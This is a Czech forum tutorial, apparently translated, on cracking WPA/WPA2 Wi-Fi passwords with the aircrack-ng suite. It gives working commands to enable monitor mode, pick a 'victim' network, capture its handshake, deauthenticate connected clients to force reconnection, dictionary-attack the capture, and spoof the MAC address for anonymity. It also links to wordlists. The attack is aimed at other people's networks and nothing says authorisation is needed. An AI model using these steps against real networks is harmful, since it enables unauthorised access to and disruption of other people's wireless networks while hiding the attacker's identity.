Tento a všechny ostatní články autora můžete nalézt také na
Kód: Vybrat vše
http://www.secusoft.be
Nedávno jsem si všiml zvláštní věci tady na fóru, všichni mají rádi WEP-cracking tutorialy, ale spousta lidí se ptá také na otázky ohledně WPA/WPA2 crackingu. Po těchto zjištěních jsem si všiml, že tu nebyly žádné tutorialy, které by se tímto zabývaly. Nebo jsem špatně hledal, to je druhá možnost .
Znalosti
Když se podíváte na útok pozorně, budete si myslet, že cracknout WPA bylo velice snadné. Někteří říkají, že to taky je a někteří, že ne. Pravdou je, že jestli je heslo v nějakém slovníku, pak může být cracknuto. Jen pro pořádek: Když se crackuje WPA2, tak je to stejné .
Budete potřebovat "4-way handshake" od klienta připojujícího se na AP(to 4-way handshake nevim jak přeložit). "4way handshake" obsahuje šifrovaný algoritmus, který může být cracknut slovníkovým útokem. Budete potřebovat velký slovník a trochu štěstí, aby to heslo bylo ve slovníku. Nebo si můžete vytvořit vlastní slovník pomocí nějakého password toolu, který se vám líbí(jako john the ripper), o který se tento tutorial nebude starat . Pro tento tutorial budu samozřejmě používat Aircrack-ng
!Volitelně:"zjednodušení"
Kód: Vybrat vše
sudo su
Seznámení se s interface
zaprvé potřebujete vědět název wifi rozhraní. Zjistíte to napsáním
Kód: Vybrat vše
iwconfig
Například u mě je název rozhraní wlan0, a jak můžete vidět, tak je to to jediný co se může někam připojit..
Určení oběti
Kód: Vybrat vše
airmon-ng start INTERFACE
(monitor mode enabled on SPOOFEDINTERFACE ) //v mém případě SPOOFEDINTERFACE bylo "mon0"..
Kód: Vybrat vše
airodump-ng SPOOFEDINTERFACE
Až si vyberet někoho s WPA, tak si napište jeho BSSID a CHANNEL.
Restartování síťové karty pro vstup do správného kanálu
Kód: Vybrat vše
airmon-ng stop SPOOFEDINTERFACE
Kód: Vybrat vše
airmon-ng start INTERFACE CHANNEL
Kód: Vybrat vše
airodump-ng -c CHANNEL --bssid BSSID -w psk SPOOFEDINTERFACE
POZOR! Můžete se zeptat sami sebe - Jak poznám, kdy mám "handshake"?
-> Aircrack na tohle myslel, a když získáte "handshake", tak se zobrazí zpráva v pravém horním rohu
!Volitelné, ale pomůže to zrychlit získání "handshake"
Vy potřebujete dostat "handshake", ale lidé co jsou připojení ji samozřejmě nebudou rozdávat. K tomu dochází jen při ověření. Kdybychom je mohli na chviklu vyhodit z jejich sítě, aby se museli znovu připojit, tak by to bylo perfektní!
Kód: Vybrat vše
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID SPOOFEDINTERFACE
Můžete zkontrolovat jestli je klient připojený, když se znovu podíváte do Airodump-ng. Jestli vidíte na spodu obrazovky, že se někdo připojil na ESSID vaší oběti, tak jednoduše použijte STATION BSSID jako CLIENTBSID v tomto příkladu
Kód: Vybrat vše
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
pozor! O crack se můžete pokusit jen, když už máte "handshake".
Nezapomeńte, -w potřebuje cestu k vašemu wordlistu, takže si pamatujte, kde jste ho uložili!
-> Aircrack-ng při pokusu o crack hesla
!Volitelné:"bezpečnost"
Jako sript kiddy(tohle je mezinárodní výraz, kterej se nepřekládá, označuje ty co si hrajou na hackery pomocí předpřipravených programů.-pozn. překladatele), můžete chtít být v anonymitě, takže tady je návod, jak si změníte svoji mac..
Zkuste to udělat sami
Kód: Vybrat vše
sudo ifconfig SPOOFEDINTERFACE down && sudo macchanger -r INTERFACE && sudo macchanger -r SPOOFEDINTERFACE && ifconfig SPOOFEDINTERFACE up
Jestli budete potřebovat nějaký dobrý wordlisty, tak se prvně podívejte tady:
Kód: Vybrat vše
http://theargon.com/achilles/wordlists/theargonlists/
Bye
díky za váš čas
Originál k nalezení na
Kód: Vybrat vše
http://adf.ly/G2F